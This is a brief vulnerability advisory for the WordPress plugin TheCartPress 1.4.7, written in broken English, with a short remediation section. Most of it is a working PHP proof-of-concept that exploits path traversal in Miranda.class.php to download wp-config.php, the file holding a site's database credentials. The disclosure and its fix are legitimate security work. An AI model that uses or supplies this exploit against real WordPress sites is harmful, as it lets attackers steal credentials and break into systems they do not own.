WordPress TheCartPress 1.4.7 Local File Disclosure Vulnerability

Summary

    Wordpress plugin TheCartPress v1.4.7 is suffer from multiple vulnerabilitiesremote attacker can disclosure some local files or do a remote code execution.


<?php

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/thecartpress/modules/Miranda.class.php?page=../../../../../../../../wp-config.php");

curl_setopt($ch, CURLOPT_HTTPGET, 1);

curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");

$buf = curl_exec ($ch);

curl_close($ch);

unset($ch);

echo $buf;

?>

Solution

    1. Modify the source code, strict filtering parameters similar "../" and "..\" and all special characters that May cause the Local File Inclusion attack;

    2. If you have purchased NGAF appliance, update WAF signature database to version 20151218 or above.